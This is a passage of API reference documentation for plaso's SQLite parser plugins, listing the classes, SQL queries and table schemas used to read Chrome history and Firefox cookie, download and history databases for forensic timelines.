VARCHAR,url_id INTEGER NON 
NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL, mime_type VARCHAR(255) NOT NULL DEFAULT "", original_mime_type VARCHAR(255) NOT NULL DEFAULT "", guid VARCHAR NOT NULL DEFAULT \'\', hash BLOB NOT NULL DEFAULT X\'\', http_method VARCHAR NOT NULL DEFAULT \'\', tab_url VARCHAR NOT NULL DEFAULT \'\', tab_referrer_url VARCHAR NOT NULL DEFAULT \'\', site_url VARCHAR NOT NULL DEFAULT \'\', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 
'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': "CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, guid VARCHAR NOT NULL DEFAULT '', hash BLOB NOT NULL DEFAULT X'', http_method VARCHAR NOT NULL DEFAULT '', tab_url VARCHAR NOT NULL DEFAULT '', tab_referrer_url VARCHAR NOT NULL DEFAULT '', site_url VARCHAR NOT NULL 
DEFAULT '', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)", 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT 
NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,last_access_time INTEGER NOT NULL,transient INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition 
INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}]

class plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPlugin
Bases: plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin
SQLite parser plugin for Google Chrome 8 - 25 history database files.
DATA_FORMAT = 'Google Chrome 8 - 25 history SQLite database file'
NAME = 'chrome_8_history'
ParseFileDownloadedRow(parser_mediator, query, row, **unused_kwargs)
Parses a file downloaded row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT urls.id, urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition, visits.id AS visit_id FROM urls, visits WHERE urls.id = visits.url ORDER BY visits.visit_time', 'ParseLastVisitedRow'), ('SELECT id, full_path, url, start_time, received_bytes, total_bytes, state FROM downloads', 'ParseFileDownloadedRow')]
REQUIRED_STRUCTURE = {'downloads': frozenset({'full_path', 'id', 'received_bytes', 'start_time', 'state', 'total_bytes', 'url'}), 'urls': frozenset({'hidden', 'id', 'last_visit_time', 'title', 'typed_count', 'url', 'visit_count'}), 'visits': frozenset({'from_visit', 'id', 'transition', 'visit_time'})}


SCHEMAS = [{'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY,value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE 
PRIMARY KEY,value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER 
PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit 
INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN,visit_duration INTEGER DEFAULT 0 NOT NULL)'}]

plaso.parsers.sqlite_plugins.firefox_cookies module

SQLite parser plugin for Mozilla Firefox cookies database files.

class plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventData
Bases: plaso.containers.events.EventData
Firefox Cookie event data.
• cookie_name (str) – name field of the cookie.
• data (str) – cookie data.
• httponly (bool) – True if the cookie cannot be accessed through client side script.
• host (str) – hostname of host that set the cookie value.
• offset (str) – identifier of the row, from which the event data was extracted.
• path (str) – URI of the page that set the cookie.
• query (str) – SQL query that was used to obtain the event data.
• secure (bool) – True if the cookie should only be transmitted over a secure channel.
DATA_TYPE = 'firefox:cookie:entry'

class plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Mozilla Firefox cookies database files.
Also see: https://hg.mozilla.org/mozilla-central/file/349a2f003529/netwerk/cookie/nsCookie.h
DATA_FORMAT = 'Mozilla Firefox cookies SQLite database file'
NAME = 'firefox_cookies'
ParseCookieRow(parser_mediator, query, row, **unused_kwargs)
Parses a cookie row.
Parameters


• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT id, baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly FROM moz_cookies', 'ParseCookieRow')]
REQUIRED_STRUCTURE = {'moz_cookies': frozenset({'baseDomain', 'creationTime', 'expiry', 'host', 'id', 'isHttpOnly', 'isSecure', 'lastAccessed', 'name', 'path', 'value'})}
SCHEMAS = [{'moz_cookies': 'CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, appId INTEGER DEFAULT 0, inBrowserElement INTEGER DEFAULT 0, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path, appId, inBrowserElement))'}]

plaso.parsers.sqlite_plugins.firefox_downloads module

SQLite parser plugin for Mozilla Firefox downloads database files.

class plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventData
Bases: plaso.containers.events.EventData
Firefox download event data.
• full_path (str) – full path of the target of the download.
• mime_type (str) – mime type of the download.
• name (str) – name of the download.
• offset (str) – identifier of the row, from which the event data was extracted.
• query (str) – SQL query that was used to obtain the event data.
• received_bytes (int) – number of bytes received.
• referrer (str) – referrer URL of the download.


• temporary_location (str) – temporary location of the download.
• total_bytes (int) – total number of bytes of the download.
• url (str) – source URL of the download.
DATA_TYPE = 'firefox:downloads:download'

class plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Mozilla Firefox downloads database files.
The Mozilla Firefox downloads database file is typically stored in: downloads.sqlite
DATA_FORMAT = 'Mozilla Firefox downloads SQLite database (downloads.sqlite) file'
NAME = 'firefox_downloads'
ParseDownloadsRow(parser_mediator, query, row, **unused_kwargs)
Parses a downloads row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT moz_downloads.id, moz_downloads.name, moz_downloads.source, moz_downloads.target, moz_downloads.tempPath, moz_downloads.startTime, moz_downloads.endTime, moz_downloads.state, moz_downloads.referrer, moz_downloads.currBytes, moz_downloads.maxBytes, moz_downloads.mimeType FROM moz_downloads', 'ParseDownloadsRow')]
REQUIRED_STRUCTURE = {'moz_downloads': frozenset({'currBytes', 'endTime', 'id', 'maxBytes', 'mimeType', 'name', 'referrer', 'source', 'startTime', 'state', 'target', 'tempPath'})}
SCHEMAS = [{'moz_downloads': 'CREATE TABLE moz_downloads (id INTEGER PRIMARY KEY, name TEXT, source TEXT, target TEXT, tempPath TEXT, startTime INTEGER, endTime INTEGER, state INTEGER, referrer TEXT, entityID TEXT, currBytes INTEGER NOT NULL DEFAULT 0, maxBytes INTEGER NOT NULL DEFAULT -1, mimeType TEXT, preferredApplication TEXT, preferredAction INTEGER NOT NULL DEFAULT 0, autoResume INTEGER NOT NULL DEFAULT 0)'}]

plaso.parsers.sqlite_plugins.firefox_history module

SQLite parser plugin for Mozilla Firefox history database files.

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Mozilla Firefox history database files.
The Mozilla Firefox history database file is typically stored in: places.sqlite
DATA_FORMAT = 'Mozilla Firefox history SQLite database (places.sqlite) file'
NAME = 'firefox_history'
ParseBookmarkAnnotationRow(parser_mediator, query, row, **unused_kwargs)
Parses a bookmark annotation row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
ParseBookmarkFolderRow(parser_mediator, query, row, **unused_kwargs)
Parses a bookmark folder row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
ParseBookmarkRow(parser_mediator, query, row, **unused_kwargs)
Parses a bookmark row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
ParsePageVisitedRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
Parses a page visited row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
• cache (Optional[SQLiteCache]) – cache.
• database (Optional[SQLiteDatabase]) – database.


QUERIES = [('SELECT moz_historyvisits.id, moz_places.url, moz_places.title, moz_places.visit_count, moz_historyvisits.visit_date, moz_historyvisits.from_visit, moz_places.rev_host, moz_places.hidden, moz_places.typed, moz_historyvisits.visit_type FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id', 'ParsePageVisitedRow'), ('SELECT moz_bookmarks.type, moz_bookmarks.title AS bookmark_title, moz_bookmarks.dateAdded, moz_bookmarks.lastModified, moz_places.url, moz_places.title AS places_title, moz_places.rev_host, moz_places.visit_count, moz_bookmarks.id FROM moz_places, moz_bookmarks WHERE moz_bookmarks.fk = moz_places.id AND moz_bookmarks.type <> 3', 'ParseBookmarkRow'), ('SELECT moz_items_annos.content, moz_items_annos.dateAdded, moz_items_annos.lastModified, moz_bookmarks.title, moz_places.url, moz_places.rev_host, moz_items_annos.id FROM moz_items_annos, moz_bookmarks, moz_places WHERE moz_items_annos.item_id = moz_bookmarks.id AND moz_bookmarks.fk = moz_places.id', 'ParseBookmarkAnnotationRow'), ('SELECT moz_bookmarks.id, moz_bookmarks.title,moz_bookmarks.dateAdded, moz_bookmarks.lastModified FROM moz_bookmarks WHERE moz_bookmarks.type = 2', 'ParseBookmarkFolderRow')]
REQUIRED_STRUCTURE = {'moz_bookmarks': frozenset({'dateAdded', 'fk', 'id', 'lastModified', 'title', 'type'}), 'moz_historyvisits': frozenset({'from_visit', 'id', 'place_id', 'visit_date', 'visit_type'}), 'moz_items_annos': frozenset({'content', 'dateAdded', 'id', 'item_id', 'lastModified'}), 'moz_places': frozenset({'hidden', 'id', 'rev_host', 'title', 'typed', 'url', 'visit_count'})}


SCHEMAS = [{'moz_anno_attributes': 'CREATE TABLE moz_anno_attributes ( id INTEGER PRIMARY KEY, name VARCHAR(32) UNIQUE NOT NULL)', 'moz_annos': 'CREATE TABLE moz_annos ( id INTEGER PRIMARY KEY, place_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_bookmarks': 'CREATE TABLE moz_bookmarks ( id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER DEFAULT NULL, parent INTEGER, position INTEGER, title LONGVARCHAR, keyword_id INTEGER, folder_type TEXT, dateAdded INTEGER, lastModified INTEGER)', 'moz_bookmarks_roots': 'CREATE TABLE moz_bookmarks_roots ( root_name VARCHAR(16) UNIQUE, folder_id INTEGER)', 'moz_favicons': 'CREATE TABLE moz_favicons ( id INTEGER PRIMARY KEY, url LONGVARCHAR UNIQUE, data BLOB, mime_type VARCHAR(32), expiration LONG)', 'moz_historyvisits': 'CREATE TABLE moz_historyvisits ( id INTEGER PRIMARY KEY, from_visit INTEGER, place_id INTEGER, visit_date INTEGER, visit_type INTEGER, session INTEGER)', 'moz_inputhistory': 'CREATE TABLE moz_inputhistory ( place_id INTEGER NOT NULL, input LONGVARCHAR NOT NULL, use_count INTEGER, PRIMARY KEY (place_id, input))', 'moz_items_annos': 'CREATE TABLE moz_items_annos ( id INTEGER PRIMARY KEY, item_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_keywords': 'CREATE TABLE moz_keywords ( id INTEGER PRIMARY KEY AUTOINCREMENT, keyword TEXT UNIQUE)', 'moz_places': 'CREATE TABLE moz_places ( id INTEGER PRIMARY KEY, url LONGVARCHAR, title LONGVARCHAR, rev_host LONGVARCHAR, visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL, typed INTEGER DEFAULT 0 NOT NULL, favicon_id INTEGER, frecency INTEGER DEFAULT -1 NOT NULL, 
last_visit_date INTEGER )'}, {'moz_anno_attributes': 'CREATE TABLE moz_anno_attributes ( id INTEGER PRIMARY KEY, name VARCHAR(32) UNIQUE NOT NULL)', 'moz_annos': 'CREATE TABLE moz_annos ( id INTEGER PRIMARY KEY, place_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_bookmarks': 'CREATE TABLE moz_bookmarks ( id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER DEFAULT NULL, parent INTEGER, position INTEGER, title LONGVARCHAR, keyword_id INTEGER, folder_type TEXT, dateAdded INTEGER, lastModified INTEGER, guid TEXT)', 'moz_bookmarks_roots': 'CREATE TABLE moz_bookmarks_roots ( root_name VARCHAR(16) UNIQUE, folder_id INTEGER)', 'moz_favicons': 'CREATE TABLE moz_favicons ( id INTEGER PRIMARY KEY, url LONGVARCHAR UNIQUE, data BLOB, mime_type VARCHAR(32), expiration LONG, guid TEXT)', 'moz_historyvisits': 'CREATE TABLE moz_historyvisits ( id INTEGER PRIMARY KEY, from_visit INTEGER, place_id INTEGER, visit_date INTEGER, visit_type INTEGER, session INTEGER)', 'moz_hosts': 'CREATE TABLE moz_hosts ( id INTEGER PRIMARY KEY, host TEXT NOT NULL UNIQUE, frecency INTEGER, typed INTEGER NOT NULL DEFAULT 0, prefix TEXT)', 'moz_inputhistory': 'CREATE TABLE moz_inputhistory ( place_id INTEGER NOT NULL, input LONGVARCHAR NOT NULL, use_count INTEGER, PRIMARY KEY (place_id, input))', 'moz_items_annos': 'CREATE TABLE moz_items_annos ( id INTEGER PRIMARY KEY, item_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER 